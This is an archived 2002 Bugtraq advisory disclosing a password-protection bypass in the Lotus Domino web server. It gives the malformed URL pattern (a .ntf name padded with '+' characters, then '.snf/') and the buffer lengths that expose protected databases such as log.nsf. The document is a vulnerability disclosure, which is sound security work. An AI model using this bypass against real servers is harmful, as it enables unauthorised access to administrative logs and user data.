Home page logo

bugtraq logo Bugtraq mailing list archives

Lotus Domino password bypass
From: "Gabriel A. Maggiotti" <gmaggiot () ciudad com ar>
Date: Mon, 04 Feb 2002 00:59:41 -0300

Web:  http://qb0x.net                   Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002                  E-mail: gmaggiot () ciudad com ar

General Info
Problem Type    :  password protected url bypass
Product         :  Lotus Domino
Scope           :  Remote
Risk            :  High

A security vulnerability has been found in the popular Lotus Domino Web server.
Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs,  this   files 
are protected by password.  I discover that is posible to bypass this  password 
if you create a malformed url.

Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in "lotus/domino/
data/" directory nas Notes Templatesi '.ntf' are store in the same  place (Here
is the goal).


I found a critical and max length.

assuming the buffer is:         http://host.com/<buffer>/

Critical buffer length: is the minimun buffer   length you need  to  bypass the 
passwd file.

normal url:     http://host.com/log.nsf <----   Request for a passwd
modify url:     http://host.com/log.ntf<buff>.snf/
                                |-----217 -------|

In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:

                       |-------- 205 -----|   

If you write a buffer between 219 and 257(higher buffer), you bypass the passwd.
modify url:     http://host.com/log.ntf<buff>.snf/
                                |---219 to 257 --|

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]